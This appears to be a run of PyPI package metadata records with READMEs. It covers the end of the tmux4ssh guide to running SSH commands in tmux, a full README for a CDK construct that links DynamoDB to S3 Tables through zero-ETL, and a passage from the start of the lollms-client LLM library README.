tmux4ssh user@host 'echo $HOME'                # Preserve $HOME for remote
tmux4ssh user@host "ls *.txt"                  # Wildcards
tmux4ssh user@host "cd '/path with spaces'"    # Paths with spaces

# OPTIONAL: Simple commands (quotes work but optional)
tmux4ssh user@host hostname                    # Single word - OK
tmux4ssh user@host "hostname"                  # Also OK
tmux4ssh user@host ls -la /tmp                 # May fail (see note below)
tmux4ssh user@host "ls -la /tmp"               # Safer with quotes
```

**Note on flags starting with `-`**: Arguments like `-la` may be interpreted as tmux4ssh flags.
Always quote commands with such arguments:

```bash
# Problematic: -la might be parsed as a flag
tmux4ssh user@host ls -la

# Safe: Quote the entire command
tmux4ssh user@host "ls -la"
```

**Best practice**: Always quote your command string to avoid surprises.

### Saved Settings

tmux4ssh automatically saves your connection settings to `~/.tmux_ssh_config`:

- **Host** (`-H`): Remote hostname
- **User** (`-U`): SSH username
- **Port** (`-p`): SSH port (default: 22)
- **Last server**: Actual server hostname (for load-balancer detection)
- **Auto-new setting**: Whether to auto-create sessions

This means you only need to specify connection details once. All subsequent commands will use the saved settings automatically.

### Concurrent Execution

By default, tmux4ssh automatically creates a new session when you run a command while another is already running:

```bash
# First command runs in default session
tmux4ssh "command1"

# Second command auto-creates a new session for concurrent execution
tmux4ssh "command2"
# Output: [*] Session 'remote_task' is busy, creating 'task_a1b2c3d4' for concurrent execution...
```

You can also explicitly control this behavior:

```bash
# Explicitly create new session (always creates a fresh session)
tmux4ssh --new "command"

# Disable auto-new, block if session is busy
tmux4ssh --no-auto "command"

# Force execution (kills any running command in session)
tmux4ssh --force "command"
```

### Session Management

```bash
# List all running commands/sessions
tmux4ssh --list

# Attach to a running session (auto-detect if only one)
tmux4ssh --attach

# Attach to a specific session
tmux4ssh --attach task_a1b2c3d4

# Clean up idle task_* sessions (keeps remote_task)
tmux4ssh --cleanup
```

When a command times out, you can resume streaming its output:

```bash
# After timeout message:
# [*] Idle timeout (3600s) reached. Command still running in tmux.
# [*] Use 'tmux4ssh --attach' to resume streaming the output.
tmux4ssh --attach
```

### Load-Balanced Hostnames

If your hostname resolves to multiple backend servers (DNS round-robin or a load balancer), tmux4ssh will warn you when you connect to a different server than before:

```
[!] WARNING: Server changed!
    Previous server: node01.cluster.example.com
    Current server:  node02.cluster.example.com
[!] Your tmux sessions from 'node01.cluster.example.com' are NOT available on 'node02.cluster.example.com'.
[*] To access previous sessions, connect directly to: node01.cluster.example.com
```

**Recommendation**: For consistent tmux session access, use specific server hostnames instead of load-balanced hostnames:

```bash
# Instead of this (may connect to different servers):
tmux4ssh -H cluster.example.com "command"

# Use this (always same server):
tmux4ssh -H node01.cluster.example.com "command"
```

### Credential Management

```bash
# Clear stored credentials
tmux4ssh --clear
```

**Tip: SSH Key Authentication**

Setting up SSH keys eliminates password prompts for every command:

```bash
# Generate key (if you don't have one)
ssh-keygen -t ed25519

# Copy public key to remote server
ssh-copy-id -i ~/.ssh/id_ed25519.pub user@hostname
```

After setup, SSH/SCP commands authenticate automatically without passwords.

**Tip: File Transfer with SCP**

Copy files between local and remote servers:

```bash
# Remote to local
scp user@hostname:/remote/path/file.txt .

# Local to remote
scp file.txt user@hostname:/remote/path/

# Copy directory recursively
scp -r user@hostname:/remote/folder ./local/
```

## Log Files

Logs are stored on the remote server in `~/tmux_ssh_logs/`:

```
~/tmux_ssh_logs/
├── remote_task_20260120_100000.log    # Timestamped log
├── remote_task_20260120_143022.log    # Another run
├── remote_task_latest.log             # Symlink to latest
├── remote_task.lock                   # Lock file (while running)
└── task_a1b2c3d4_20260120_110000.log  # Log from --new session
```

The lock file contains information about the running command:

```
cmd: spectre simulation.scs
started: Mon Jan 20 10:00:00 UTC 2026
session: remote_task
log: ~/tmux_ssh_logs/remote_task_20260120_100000.log
```

## Command Line Options

| Option | Description |
|--------|-------------|
| `-H, --host` | Remote hostname |
| `-U, --user` | Remote username |
| `-p, --port` | SSH port (default: 22) |
| `-t, --timeout` | Max seconds to stream (default: unlimited) |
| `-i, --idle-timeout` | Exit if no output for N seconds (default: 3600) |
| `-n, --new` | Create a new unique tmux session (inherits cwd, auto-terminates) |
| `-f, --force` | Force execution, kill any running command |
| `-k, --kill [SESSION]` | Kill running command (auto-detect if not specified) |
| `-y, --yes` | Skip confirmation prompt (for --kill) |
| `-a, --attach [SESSION]` | Attach to session (auto-detect if not specified) |
| `-l, --list` | List all running commands/sessions |
| `--cleanup` | Clean up idle task_* sessions (keeps remote_task) |
| `--auto` | Auto-create new session if command already running (default: true) |
| `--no-auto` | Disable auto-create, block if command already running |
| `-C, --clear` | Clear stored credentials |

## Exit Codes

| Code | Meaning |
|------|---------|
| 0 | Command completed successfully |
| 1 | Connection or execution error |
| 2 | Timeout reached, command still running |
| 3 | Blocked by running command |

## FAQ

### Will closing my laptop or losing internet kill my remote task?

**No.** Your remote command continues running safely in the tmux session on the server.

```
┌─────────────────┐         ┌─────────────────────────────────────┐
│   Your Laptop   │   SSH   │          Remote Server              │
│                 │ ──────► │                                     │
│   tmux4ssh      │         │  tmux session (remote_task)         │
│   (streaming    │ ◄────── │   └── your command running          │
│    output only) │  tail   │   └── output → log file             │
└─────────────────┘         └─────────────────────────────────────┘
```

When you close your laptop or lose connection:

1. The SSH connection drops
2. The local `tmux4ssh` process terminates
3. **The remote command keeps running** inside the tmux session
4. Output continues to be written to the log file

When you reconnect later, use `tmux4ssh --attach` to resume streaming.

### What happens if I press Ctrl+C locally?

**Ctrl+C only stops the local streaming process.** The remote command continues running. This is safe and expected behavior; you can press Ctrl+C anytime to stop watching the output without affecting the remote task.

To resume streaming later:

```bash
tmux4ssh --attach
```

### How do I actually terminate a running remote command?
Use the `--kill` option:

```bash
# Kill command in auto-detected session
tmux4ssh --kill

# Kill command in a specific session
tmux4ssh --kill task_a1b2c3d4
```

Alternative options:

```bash
# Use --force to kill and run a new command
tmux4ssh --force "new_command"

# SSH directly and kill the process
ssh user@host pkill -f "your_command_pattern"

# SSH directly and attach to tmux, then Ctrl+C
ssh user@host tmux attach -t remote_task
# Now Ctrl+C will kill the command inside tmux
```

## Development

### Running Tests

```bash
# Run all tests (unit tests only by default)
pytest

# Run unit tests only
pytest -m unit

# Run integration tests (requires live SSH connection)
pytest -m integration

# Run with coverage report
pytest --cov=tmux_ssh --cov-report=html
```

### Code Quality

```bash
# Run linter
ruff check src tests

# Run type checker
mypy src tests

# Run all pre-commit hooks
pre-commit run --all-files
```

## Project Structure

```
tmux_ssh/
├── src/
│   └── tmux_ssh/
│       ├── __init__.py
│       ├── client.py            # Main TmuxSSHClient class
│       └── cli.py               # Command-line interface
├── tests/
│   ├── conftest.py              # Test fixtures
│   ├── test_unit.py             # Unit tests (mocked)
│   └── test_integration.py      # Integration tests (live SSH)
├── pyproject.toml
├── .pre-commit-config.yaml
└── README.md
```

## License

Apache 2.0

---

*Spectre® is a registered trademark of Cadence Design Systems, Inc. All other trademarks are the property of their respective owners.*
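One closing note for automation: the exit codes documented in the table above make tmux4ssh usable from wrapper scripts. A hypothetical Python sketch (the `run_remote` wrapper and the assumption that `tmux4ssh` is on PATH are ours, not part of the package):

```python
import subprocess

# Meanings copied from the exit-code table in this README.
EXIT_MEANINGS = {
    0: "command completed successfully",
    1: "connection or execution error",
    2: "timeout reached, command still running",
    3: "blocked by running command",
}

def classify_exit(code: int) -> str:
    """Map a tmux4ssh exit code to a human-readable status."""
    return EXIT_MEANINGS.get(code, "unknown exit code")

def run_remote(command: str) -> str:
    """Run a command through tmux4ssh and report its status (hypothetical wrapper)."""
    result = subprocess.run(["tmux4ssh", command])
    return classify_exit(result.returncode)
```

For example, exit code 2 is not a failure here: the remote command is still running, and a wrapper could react by invoking `tmux4ssh --attach` later.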
text/markdown
Gaofeng Fan
null
null
null
Apache 2.0
ssh, tmux, remote, command, automation
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", ...
[]
null
null
>=3.10
[]
[]
[]
[ "paramiko>=3.0.0", "keyring>=24.0.0", "pytest>=8.0.0; extra == \"dev\"", "pytest-cov>=4.0.0; extra == \"dev\"", "pytest-mock>=3.12.0; extra == \"dev\"", "ruff>=0.1.0; extra == \"dev\"", "mypy>=1.8.0; extra == \"dev\"", "pre-commit>=3.6.0; extra == \"dev\"", "types-paramiko>=3.0.0; extra == \"dev\"" ...
[]
[]
[]
[ "Homepage, https://github.com/circuitmuggle/tmux4ssh", "Repository, https://github.com/circuitmuggle/tmux4ssh" ]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:10:40.282645
tmux4ssh-0.1.0.tar.gz
26,483
94/b7/428e4c2ef8d7b374639860c5cb030aef430ddb714b97a4ec1fa6a74ead1d/tmux4ssh-0.1.0.tar.gz
source
sdist
null
false
7ee24e93e3da4c0e6a1413930eca5ae3
345e8f6bdda3c3d666c2d924d0e8a476fbbb220c070db508a8ae86b4ed93e6ef
94b7428e4c2ef8d7b374639860c5cb030aef430ddb714b97a4ec1fa6a74ead1d
null
[ "LICENSE" ]
235
2.1
dynamodb-zero-etl-s3tables
0.1.7
AWS CDK L3 construct that creates a complete zero-ETL integration from Amazon DynamoDB to Amazon S3 Tables (Apache Iceberg)
# dynamodb-zero-etl-s3tables

[![npm version](https://badge.fury.io/js/dynamodb-zero-etl-s3tables.svg)](https://www.npmjs.com/package/dynamodb-zero-etl-s3tables)
[![PyPI version](https://badge.fury.io/py/dynamodb-zero-etl-s3tables.svg)](https://pypi.org/project/dynamodb-zero-etl-s3tables/)
[![NuGet version](https://img.shields.io/nuget/v/LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables.svg)](https://www.nuget.org/packages/LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables/)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![jsii](https://img.shields.io/badge/jsii-compatible-brightgreen.svg)](https://github.com/aws/jsii)
[![stability: experimental](https://img.shields.io/badge/stability-experimental-orange.svg)](https://www.npmjs.com/package/dynamodb-zero-etl-s3tables)

An AWS CDK L3 construct that wires up a complete **zero-ETL integration** from **Amazon DynamoDB** to **Amazon S3 Tables** (Apache Iceberg) in a single line of code.

> **Zero-ETL** eliminates the need to build and maintain ETL pipelines. Data flows automatically from your DynamoDB table into Iceberg tables on S3, ready for analytics with Athena, Redshift, EMR, and more.

## Why this construct?

Setting up DynamoDB zero-ETL to S3 Tables manually requires **7+ resources** across DynamoDB, S3 Tables, IAM, Glue, and custom resources, each with specific permissions, dependencies, and ordering constraints. One misconfigured policy and the integration silently fails.
This construct handles all of that for you:

```
┌──────────────┐         ┌──────────────────┐         ┌─────────────────┐
│              │         │                  │         │                 │
│   DynamoDB   │────────▶│    AWS Glue      │────────▶│   S3 Tables     │
│    Table     │  zero   │   Integration    │  write  │   (Iceberg)     │
│              │   ETL   │                  │         │                 │
└──────────────┘         └──────────────────┘         └─────────────────┘
       │                         │                            │
       ▼                         ▼                            ▼
Resource Policy           Catalog Policy                Table Bucket
 (Glue export)          (Custom Resource)             IAM Target Role
```

**What gets created:**

| Resource | Purpose |
|----------|---------|
| `AWS::S3Tables::TableBucket` | Iceberg-native storage for your analytics data |
| `AWS::IAM::Role` | Least-privilege role for Glue to write to S3 Tables and the catalog |
| `AWS::Glue::Integration` | The zero-ETL integration connecting source to target |
| `AWS::Glue::IntegrationResourceProperty` | Wires the target IAM role to the integration |
| `Custom::AWS` (AwsCustomResource) | Sets the Glue Data Catalog resource policy (no CloudFormation support) |
| DynamoDB Resource Policy | Allows Glue to export and describe the source table |

## Installation

**TypeScript/JavaScript:**

```bash
npm install dynamodb-zero-etl-s3tables
```

**Python:**

```bash
pip install dynamodb-zero-etl-s3tables
```

**Java (Maven):**

```xml
<dependency>
  <groupId>io.github.leeroyhannigan</groupId>
  <artifactId>dynamodb-zero-etl-s3tables</artifactId>
</dependency>
```

**.NET:**

```bash
dotnet add package LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables
```

## Quick Start

```typescript
import { DynamoDbZeroEtlToS3Tables } from 'dynamodb-zero-etl-s3tables';
import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';

const table = new dynamodb.Table(this, 'Table', {
  tableName: 'Orders',
  partitionKey: { name: 'PK', type: dynamodb.AttributeType.STRING },
  sortKey: { name: 'SK', type: dynamodb.AttributeType.STRING },
  billingMode: dynamodb.BillingMode.PAY_PER_REQUEST,
  pointInTimeRecovery: true,
});

new DynamoDbZeroEtlToS3Tables(this, 'ZeroEtl', {
  table,
  tableBucketName: 'orders-iceberg-bucket',
});
```

That's it.
Your DynamoDB data will automatically replicate to Iceberg tables on S3.

## Props

| Property | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `table` | `dynamodb.Table` | Yes | — | DynamoDB table with an explicit `tableName` and PITR enabled |
| `tableBucketName` | `string` | Yes | — | Name for the S3 Table Bucket |
| `integrationName` | `string` | No | `'ddb-to-s3tables'` | Name for the Glue zero-ETL integration |

## Exposed Properties

All key resources are exposed as public properties for extension:

| Property | Type | Description |
|----------|------|-------------|
| `tableBucket` | `s3tables.CfnTableBucket` | The S3 Table Bucket for Iceberg storage |
| `targetRole` | `iam.Role` | The IAM role Glue uses to write to the target |
| `integration` | `glue.CfnIntegration` | The Glue zero-ETL integration |

## Customization Examples

### Add custom permissions to the target role

```typescript
const zeroEtl = new DynamoDbZeroEtlToS3Tables(this, 'ZeroEtl', {
  table,
  tableBucketName: 'my-bucket',
});

zeroEtl.targetRole.addToPolicy(new iam.PolicyStatement({
  actions: ['s3:GetObject'],
  resources: ['arn:aws:s3:::my-other-bucket/*'],
}));
```

### Configure Iceberg file maintenance

```typescript
zeroEtl.tableBucket.unreferencedFileRemoval = {
  status: 'Enabled',
  unreferencedDays: 10,
  noncurrentDays: 30,
};
```

### Tag the integration

```typescript
zeroEtl.integration.tags = [
  { key: 'Environment', value: 'production' },
  { key: 'Team', value: 'analytics' },
];
```

## Prerequisites

Your DynamoDB table **must** have:

1. **An explicit `tableName`**: auto-generated names (CloudFormation tokens) are not supported. The construct validates this at synth time.
2. **Point-in-time recovery (PITR) enabled**: required by the zero-ETL integration for data export. The construct validates this at synth time.

If either requirement is not met, the construct throws a descriptive error during synthesis.

## How It Works

1. **S3 Table Bucket** is created as the Iceberg-native target for your data
2. **IAM Role** is created with least-privilege permissions for S3 Tables, Glue Catalog, CloudWatch, and Logs
3. **DynamoDB Resource Policy** is set on your table, allowing the Glue service to export data
4. **Glue Catalog Resource Policy** is applied via a custom resource (CloudFormation doesn't support this natively)
5. **Integration Resource Property** wires the IAM role to the target catalog
6. **Glue Integration** is created, connecting your DynamoDB table to the S3 Tables catalog

All resources are created with correct dependency ordering to ensure a successful single-deploy experience.

## Querying Your Data

Once the integration is active, your DynamoDB data is available as Iceberg tables. Query with Amazon Athena:

```sql
SELECT * FROM "s3tablescatalog/my-bucket"."namespace"."table_name" LIMIT 10;
```

## Security

* All IAM permissions follow **least-privilege** principles
* S3 Tables permissions are scoped to the specific bucket and sub-resources
* Glue catalog permissions are scoped to the account's catalog and databases
* The DynamoDB resource policy uses `aws:SourceAccount` and `aws:SourceArn` conditions
* CloudWatch metrics are conditioned on the `AWS/Glue/ZeroETL` namespace

## Contributing

Contributions, issues, and feature requests are welcome!

* [GitHub Repository](https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables)
* [Issue Tracker](https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables/issues)

## License

This project is licensed under the [MIT License](https://opensource.org/licenses/MIT).

## Author

**Lee Hannigan** - [GitHub](https://github.com/LeeroyHannigan)
text/markdown
Lee Hannigan<lhnng@amazon.com>
null
null
null
MIT
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables.git
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.238.0", "constructs<11.0.0,>=10.5.1", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables.git" ]
twine/6.1.0 CPython/3.14.2
2026-02-19T22:10:39.353910
dynamodb_zero_etl_s3tables-0.1.7.tar.gz
182,792
b5/c3/0092d1375b1cbb9825c96b98fed0d18f0a855ef566982848a0d9076b6afa/dynamodb_zero_etl_s3tables-0.1.7.tar.gz
source
sdist
null
false
9a56d30d0860e28544922f1cc0cb23fa
be3d8632103550e5d1ad7ef68f8faa3886c7415ddcdd488292c2bda059e31f65
b5c30092d1375b1cbb9825c96b98fed0d18f0a855ef566982848a0d9076b6afa
null
[]
222
2.4
lollms-client
1.11.7
A client library for LoLLMs generate endpoint
# LoLLMs Client Library

[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![PyPI version](https://badge.fury.io/py/lollms_client.svg)](https://badge.fury.io/py/lollms_client)
[![Python Versions](https://img.shields.io/pypi/pyversions/lollms_client.svg)](https://pypi.org/project/lollms-client/)
[![Downloads](https://static.pepy.tech/personalized-badge/lollms-client?period=total&units=international_system&left_color=grey&right_color=green&left_text=Downloads)](https://pepy.tech/project/lollms-client)
[![Documentation - Usage](https://img.shields.io/badge/docs-Usage%20Guide-brightgreen)](DOC_USE.md)
[![Documentation - Developer](https://img.shields.io/badge/docs-Developer%20Guide-blue)](DOC_DEV.md)
[![GitHub stars](https://img.shields.io/github/stars/ParisNeo/lollms_client.svg?style=social&label=Star&maxAge=2592000)](https://github.com/ParisNeo/lollms_client/stargazers/)
[![GitHub issues](https://img.shields.io/github/issues/ParisNeo/lollms_client.svg)](https://github.com/ParisNeo/lollms_client/issues)

**`lollms_client`** is a powerful and flexible Python library designed to simplify interactions with the **LoLLMs (Lord of Large Language Models)** ecosystem and various other Large Language Model (LLM) backends. It provides a unified API for text generation, multimodal operations (text-to-image, text-to-speech, etc.), and robust function calling through the Model Context Protocol (MCP).

Whether you're connecting to a remote LoLLMs server, an Ollama instance, the OpenAI API, or running models locally using GGUF (via `llama-cpp-python` or a managed `llama.cpp` server), Hugging Face Transformers, or vLLM, `lollms-client` offers a consistent and developer-friendly experience.
## Key Features

* 🔌 **Versatile Binding System:** Seamlessly switch between different LLM backends (LoLLMs, Ollama, OpenAI, Llama.cpp, Transformers, vLLM, OpenLLM, Gemini, Claude, Groq, OpenRouter, Hugging Face Inference API) using a unified `llm_binding_config` dictionary for all parameters.
* 🗣️ **Comprehensive Multimodal Support:** Interact with models capable of processing images, and generate various outputs like speech (TTS), video (TTV), and music (TTM).
* 🎨 **Advanced Image Generation and Editing:** A new `diffusers` binding provides powerful text-to-image capabilities. It supports a wide range of models from Hugging Face and Civitai, including specialized models like `Qwen-Image-Edit` for single-image editing and the cutting-edge `Qwen-Image-Edit-2509` for **multi-image fusion, pose transfer, and character swapping**.
* 🖼️ **Selective Image Activation:** Control which images in a message are active and sent to the model, allowing for fine-grained multimodal context management without deleting the original data.
* 🤖 **Agentic Workflows with MCP:** Empower LLMs to act as sophisticated agents, breaking down complex tasks, selecting and executing external tools (e.g., internet search, code interpreter, file I/O, image generation) through the Model Context Protocol (MCP) using a robust "observe-think-act" loop.
* 🎭 **Personalities as Agents:** Personalities can now define their own set of required tools (MCPs) and have access to static or dynamic knowledge bases (`data_source`), turning them into self-contained, ready-to-use agents.
* 🚀 **Streaming & Callbacks:** Efficiently handle real-time text generation with customizable callback functions across all generation methods, including during agentic (MCP) interactions.
* 📑 **Long Context Processing:** The `long_context_processing` method (formerly `sequential_summarize`) intelligently chunks and synthesizes texts that exceed the model's context window, suitable for summarization or deep analysis.
* 📝 **Advanced Structured Content Generation:** Reliably generate structured JSON output from natural language prompts using the `generate_structured_content` helper method, enforcing a specific schema.
* 💬 **Advanced Discussion Management:** Robustly manage conversation histories with `LollmsDiscussion`, featuring branching, context exporting, and automatic pruning.
* 🧠 **Persistent Memory & Data Zones:** `LollmsDiscussion` now supports multiple, distinct data zones (`user_data_zone`, `discussion_data_zone`, `personality_data_zone`) and a long-term `memory` field. This allows for sophisticated context layering and state management, enabling agents to learn and remember over time.
* ✍️ **Structured Memorization:** The `memorize()` method analyzes a conversation to extract its essence (e.g., a problem and its solution), creating a structured "memory" with a title and content. These memories are stored and can be explicitly loaded into the AI's context, providing a more robust and manageable long-term memory system.
* 📊 **Detailed Context Analysis:** The `get_context_status()` method provides a rich, detailed breakdown of the prompt context, showing the content and token count for each individual component (system prompt, data zones, message history).
* ⚙️ **Standardized Configuration Management:** A unified dictionary-based system (`llm_binding_config`) to configure any binding in a consistent manner.
* 🧩 **Extensible:** Designed to easily incorporate new LLM backends and modality services, including custom MCP toolsets.
* 📝 **High-Level Operations:** Includes convenience methods for complex tasks like sequential summarization and deep text analysis directly within `LollmsClient`.

## Installation

You can install `lollms_client` directly from PyPI:

```bash
pip install lollms-client
```

This will install the core library.
Some bindings may require additional dependencies (e.g., `llama-cpp-python`, `torch`, `transformers`, `ollama`, `vllm`, `Pillow` for image utilities, `docling` for document parsing). The library attempts to manage these using `pipmaster`, but for complex dependencies (especially those requiring compilation, like `llama-cpp-python` with GPU support), manual installation may be preferable.

## Core Generation Methods

The `LollmsClient` provides several methods for generating text, catering to different use cases.

### Basic Text Generation (`generate_text`)

This is the most straightforward method for generating a response based on a simple prompt.

```python
from lollms_client import LollmsClient, MSG_TYPE
from ascii_colors import ASCIIColors
import os

# Callback for streaming output
def simple_streaming_callback(chunk: str, msg_type: MSG_TYPE, params=None, metadata=None) -> bool:
    if msg_type == MSG_TYPE.MSG_TYPE_CHUNK:
        print(chunk, end="", flush=True)
    elif msg_type == MSG_TYPE.MSG_TYPE_EXCEPTION:
        ASCIIColors.error(f"\nStreaming Error: {chunk}")
    return True  # Return True to continue streaming

try:
    # Initialize the client to connect to a LoLLMs server.
    # All binding-specific parameters now go into the 'llm_binding_config' dictionary.
    lc = LollmsClient(
        llm_binding_name="lollms",  # This is the default binding
        llm_binding_config={
            "host_address": "http://localhost:9642",  # Default port for the LoLLMs server
            # "service_key": "your_lollms_api_key_here"  # Get a key from LoLLMs UI -> User Settings if security is enabled
            # "verify_ssl_certificate": True  # If False, SSL certificate verification is skipped (only relevant when the service address uses https)
        }
    )

    prompt = "Tell me a fun fact about space."
ASCIIColors.yellow(f"Prompt: {prompt}") # Generate text with streaming ASCIIColors.green("Streaming Response:") response_text = lc.generate_text( prompt, n_predict=100, stream=True, streaming_callback=simple_streaming_callback ) print("\n--- End of Stream ---") # The 'response_text' variable will contain the full concatenated text # if streaming_callback returns True throughout. if isinstance(response_text, str): ASCIIColors.cyan(f"\nFull streamed text collected: {response_text[:100]}...") elif isinstance(response_text, dict) and "error" in response_text: ASCIIColors.error(f"Error during generation: {response_text['error']}") except ValueError as ve: ASCIIColors.error(f"Initialization Error: {ve}") ASCIIColors.info("Ensure a LoLLMs server is running or configure another binding.") except ConnectionRefusedError: ASCIIColors.error("Connection refused. Is the LoLLMs server running at http://localhost:9642?") except Exception as e: ASCIIColors.error(f"An unexpected error occurred: {e}") ``` ### Generating from Message Lists (`generate_from_messages`) For more complex conversational interactions, you can provide the LLM with a list of messages, similar to the OpenAI Chat Completion API. This allows you to define roles (system, user, assistant) and build multi-turn conversations programmatically. 
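Before looking at the library call, note that the message list itself is plain data: a list of dictionaries with `role` and `content` keys. Here is a minimal, self-contained sketch of how such a list can be flattened into a single prompt string (the `flatten_messages` helper and its "role: content" template are illustrative assumptions for demonstration, not part of `lollms-client`; real bindings apply each model's own chat template):

```python
# Illustrative helper (NOT a lollms-client API): flatten an OpenAI-style
# message list into one prompt string. The "role: content" layout is a
# simplifying assumption; actual bindings use model-specific chat templates.
def flatten_messages(messages: list) -> str:
    lines = []
    for msg in messages:
        lines.append(f"{msg['role']}: {msg['content']}")
    lines.append("assistant: ")  # leave an open slot for the model's reply
    return "\n".join(lines)

messages = [
    {"role": "system", "content": "You are a helpful assistant."},
    {"role": "user", "content": "Explain recursion briefly."},
]
print(flatten_messages(messages))
```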
```python
from lollms_client import LollmsClient, MSG_TYPE
from ascii_colors import ASCIIColors
import os

def streaming_callback_for_messages(chunk: str, msg_type: MSG_TYPE, params=None, metadata=None) -> bool:
    if msg_type == MSG_TYPE.MSG_TYPE_CHUNK:
        print(chunk, end="", flush=True)
    return True

try:
    # Example for an Ollama binding
    # Ensure you have Ollama installed and model 'llama3' pulled (e.g., ollama pull llama3)
    lc = LollmsClient(
        llm_binding_name="ollama",
        llm_binding_config={
            "model_name": "llama3",
            "host_address": "http://localhost:11434"  # Default Ollama address
        }
    )

    # Define the conversation history as a list of messages
    messages = [
        {"role": "system", "content": "You are a helpful assistant that specializes in programming."},
        {"role": "user", "content": "Hello, what's your name?"},
        {"role": "assistant", "content": "I am an AI assistant created by Google."},
        {"role": "user", "content": "Can you explain recursion in Python?"}
    ]

    ASCIIColors.yellow("\nGenerating response from messages:")
    response_text = lc.generate_from_messages(
        messages=messages,
        n_predict=200,
        stream=True,
        streaming_callback=streaming_callback_for_messages
    )
    print("\n--- End of Message Stream ---")
    ASCIIColors.cyan(f"\nFull collected response: {response_text[:150]}...")

except Exception as e:
    ASCIIColors.error(f"Error during message generation: {e}")
```

### Advanced Structured Content Generation (`generate_structured_content`)

The `generate_structured_content` method is a powerful utility for forcing an LLM's output into a specific JSON format. It's ideal for extracting information, getting consistent tool parameters, or any task requiring reliable, machine-readable output.

```python
from lollms_client import LollmsClient
from ascii_colors import ASCIIColors
import json
import os

try:
    # Using Ollama as an example binding
    lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llama3"})

    text_block = "John Doe is a 34-year-old software engineer from New York. He loves hiking and Python programming."

    # Define the exact JSON structure you want
    output_template = {
        "full_name": "string",
        "age": "integer",
        "profession": "string",
        "city": "string",
        "hobbies": ["list", "of", "strings"]  # Example of a list in the schema
    }

    ASCIIColors.yellow(f"\nExtracting structured data from: '{text_block}'")
    ASCIIColors.yellow(f"Using schema: {json.dumps(output_template)}")

    # Generate the structured data
    extracted_data = lc.generate_structured_content(
        prompt=f"Extract the relevant information from the following text:\n\n{text_block}",
        schema=output_template,  # Note: the parameter is 'schema'
        temperature=0.0  # Use a low temperature for deterministic structured output
    )

    if extracted_data:
        ASCIIColors.green("\nExtracted Data (JSON):")
        print(json.dumps(extracted_data, indent=2))
    else:
        ASCIIColors.error("\nFailed to extract structured data.")

except Exception as e:
    ASCIIColors.error(f"An error occurred during structured content generation: {e}")
```

## Advanced Discussion Management

The `LollmsDiscussion` class is a core component for managing conversational state, including message history, long-term memory, and various context zones.

### Basic Chat with `LollmsDiscussion`

For general conversational agents that need to maintain context across turns, `LollmsDiscussion` simplifies the process. It automatically handles message formatting, history management, and context window limitations.

```python
from lollms_client import LollmsClient, LollmsDiscussion, MSG_TYPE, LollmsDataManager
from ascii_colors import ASCIIColors
from pathlib import Path
import os
import tempfile

# Initialize LollmsClient
try:
    lc = LollmsClient(
        llm_binding_name="ollama",
        llm_binding_config={
            "model_name": "llama3",
            "host_address": "http://localhost:11434"
        }
    )
except Exception as e:
    ASCIIColors.error(f"Failed to initialize LollmsClient for discussion: {e}")
    exit()

# Create a new discussion. For persistent discussions, pass a db_manager.
# Using a temporary directory for the database for this example's simplicity with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "discussion_db.sqlite" db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion_id = "basic_chat_example" discussion = db_manager.get_discussion(lc, discussion_id) if not discussion: ASCIIColors.yellow(f"\nCreating new discussion '{discussion_id}'...") discussion = LollmsDiscussion.create_new( lollms_client=lc, db_manager=db_manager, id=discussion_id, autosave=True # Important for persistence ) discussion.system_prompt = "You are a friendly and helpful AI." discussion.commit() else: ASCIIColors.green(f"\nLoaded existing discussion '{discussion_id}'.") # Define a simple callback for streaming def chat_callback(chunk: str, msg_type: MSG_TYPE, **kwargs) -> bool: if msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) return True try: ASCIIColors.cyan("> User: Hello, how are you today?") response = discussion.chat( user_message="Hello, how are you today?", streaming_callback=chat_callback ) print("\n") # Newline after stream finishes ai_message = response['ai_message'] user_message = response['user_message'] ASCIIColors.green(f"< Assistant (Full): {ai_message.content[:100]}...") # Now, continue the conversation ASCIIColors.cyan("\n> User: Can you recommend a good book?") response = discussion.chat( user_message="Can you recommend a good book?", streaming_callback=chat_callback ) print("\n") # You can inspect the full message history ASCIIColors.magenta("\n--- Discussion History (last 3 messages) ---") for msg in discussion.get_messages()[-3:]: print(f"[{msg.sender.capitalize()}]: {msg.content[:50]}...") except Exception as e: ASCIIColors.error(f"An error occurred during discussion chat: {e}") ``` ### Building Stateful Agents with Memory and Data Zones The `LollmsDiscussion` class provides a sophisticated system for creating stateful agents that can remember information across conversations. 
This is achieved through a layered system of "context zones" that are automatically combined into the AI's system prompt.

#### Understanding the Context Zones

The AI's context is more than just chat history. It's built from several distinct components, each with a specific purpose:

* **`system_prompt`**: The foundational layer defining the AI's core identity, persona, and primary instructions.
* **`memory`**: The AI's long-term, persistent memory. It stores key facts about the user or topics, built up over time using the `memorize()` method.
* **`user_data_zone`**: Holds session-specific information about the user's current state or goals (e.g., "User is currently working on 'file.py'").
* **`discussion_data_zone`**: Contains state or meta-information about the current conversational task (e.g., "Step 1 of the plan is complete").
